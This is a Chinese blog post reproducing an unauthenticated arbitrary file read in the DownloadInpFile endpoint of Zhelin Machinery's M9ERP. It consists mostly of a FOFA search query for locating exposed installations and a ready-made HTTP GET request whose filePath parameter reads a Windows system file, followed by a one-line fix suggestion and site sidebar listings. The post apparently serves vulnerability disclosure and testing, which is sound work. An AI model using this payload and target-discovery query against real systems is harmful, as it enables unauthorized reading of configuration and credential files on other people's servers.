哲霖机械M9ERP DownloadInpFile 任意文件读取

最新推荐文章于 2024-09-13 17:30:30 发布
最新推荐文章于 2024-09-13 17:30:30 发布
阅读量100 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142209158
版权

0x01 漏洞描述:

折霖机械M9ERP Downloadlnpfie 接口存在件意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x02 搜索语句:

Fofa:body="Api/UserApi/GetUserName"

0x03 漏洞复现:

GET /Basics/DownloadInpFile?filePath=C:\windows\win.ini HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

 

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
专栏目录
哲霖机械M9ERP DownloadInpFile 任意文件读取漏洞复现
0xSec
08-23 46
哲霖机械M9ERP DownloadInpFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
未公开 哲霖机械M9ERP DownloadInpFile 任意文件读取漏洞
weixin_43167326的博客
09-13 649
哲霖机械M9ERP接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。。
计算文本文件中特定字符的数量(Python)
TCatTime的博客
04-18 1万+
目录 题目描述 输入/输出描述 解题思路 代码 代码走读 测试用例 1. 正常场景 2. 鲁棒性测试场景 传送门 题目描述 随机生成一个txt文件。要求文件的行数随机1 -- 100行。每一行随机1 -- 100个字符。字符随机从数字和大小写字母中选取。 输入一个字符,计算该字符在随机生成的txt文件中出现的次数。如果输入的是字母,不区分大小写,来计算其出现的次数。...
Base64 & UUE 文件编码解码工具及使用说明
热门推荐
编程路
05-23 2万+
一个 Base64 & UUE 文件编码/解码工具(可自定义编码表),含源程序。
u-blox模块-- UBX protocol(NEO-M9N-00B-00)
JohnnyTim的博客
08-03 1729
Debug 数据,接上串口通过发送UBX指令进行参数配置,以下是简单的几条配置指令。 enable GxGGA B5 62 06 01 03 00 F0 00 01 FB 10 B5 62 05 01 02 00 06 01 0F 38 disable GxGGA B5 62 06 01 03 00 F0 00 00 FA 0F B5 62 05 01 02 00 06 01 0F 38 --------------------------------------------- enable GxGL
FPGA RAM M9K不够用问题及解决方案
chief_cf的博客
12-26 1万+
在做工程时发现一个问题,用quartusII综合时提示我所选的芯片M9K不够用,如果放在平时,只需要更换成资源多的芯片就可以,但是这次不行,为什么?因为必须在这个型号下进行实现,这就是这篇文章的目的,当因为外在原因无法更换芯片,而FPGA内部部分资源不够用时该怎么解决。我的工程之前是在EP4CE6E22C8N上进行实现,LE有6K、M9K有30个,以前的工程可以跑起来问题,我现在增加了算法,主要是F
MD5原理及加密字符串和文件
土豆洋芋山药蛋的博客
11-20 9074
基本概念 MD5,全名Message Digest Algorithm 5 ,中文名为消息摘要算法第五版,为计算机安全领域广泛使用的一种散列函数,用以提供消息的完整性保护。 主要是通过特定的hash散列方法将文本信息转换成简短的信息摘要,压缩+加密+hash算法的结合体,是绝对不可逆的。 不同消息(文件)的MD5码不一样,所以经常用来检验文件是否被修改过。 使用MD5加密消息和字符串(
ubuntu18.04VNCview文件传输问题
gsls200808的专栏
11-21 1万+
很多文章说VNCview不能传输文件,实际上这是一个误区。 以ubuntu为例,默认使用 sudo apt-get vnc4server 这个命令安装上的vncserver实际是tigerVNC的VNCserver 参考:https://packages.debian.org/sid/vnc4server   然后很多人使用realVNC 的VNCview去连接发现 文件传输按钮提...
微型计算机飞傲m9,独家揭秘评测飞傲m9和山灵m5s哪个好?功能有什么区别?良心点评推荐...
weixin_33076057的博客
06-27 1994
两个区别还是有的,款式和配置不一样的,整体来说飞傲M9要好一些,不过家用的话都是可以的,看个人吧,我自己用的是飞傲M9,款式是我喜欢的,多大气的,整体看着相当上档次,质感也不错,然后音效十分立体,然后做工十分细腻,操作十分方便,价钱也很合理,太实用的一款了,用了快一年了,总体是满意的。飞傲M9配置参数品牌: 飞傲(FiiO)商品名称:飞傲(FiiO)M9商品编号:41454745491商品毛重:2...
m9主题文件 .rar
04-17
m9主题文件 试用flyme1.x
RFID密钥小精灵V3.4蓝牙卡M8M9解密加密.rar
12-03
在本场景中,"RFID密钥小精灵V3.4蓝牙卡M8M9解密加密.rar" 提供了一个工具,专门针对M8和M9型号的停车场蓝牙卡进行读取、解密和加密操作。 M8和M9蓝牙卡是广泛应用在停车管理系统中的电子设备,它们内置了RFID芯片...
AutoCAD 2020机械设计零基础视频教程下载第9课-CAD界面认识-M9.mp4
04-13
AutoCAD二次开发C# 编程基础视频教程
最新版windows apache-tomcat-10.0.0-M9-windows-x64.zip
10-15
这里我们关注的是针对Windows平台的最新版本,即Apache Tomcat 10.0.0-M9的64位版本。 **Windows环境下的Apache Tomcat** 在Windows操作系统上安装和配置Apache Tomcat,通常需要以下步骤: 1. **下载与解压**:...
【网络安全】漏洞挖掘之CVE-2019-9670+检测工具
等风来
09-09 240
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
2024网络安全人才实战能力白皮书安全测试评估篇
最新发布
2301_76786857的博客
09-13 585
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
【网络安全】漏洞挖掘:文件上传实现Webshell
等风来
09-10 250
接着,我上传webshell.php文件文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
2302_81156108的博客
09-07 1880
学习网络安全的一些心得希望对大家起到一些帮助
网络安全(黑客)——自学2024
2401_84466325的博客
09-13 941
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值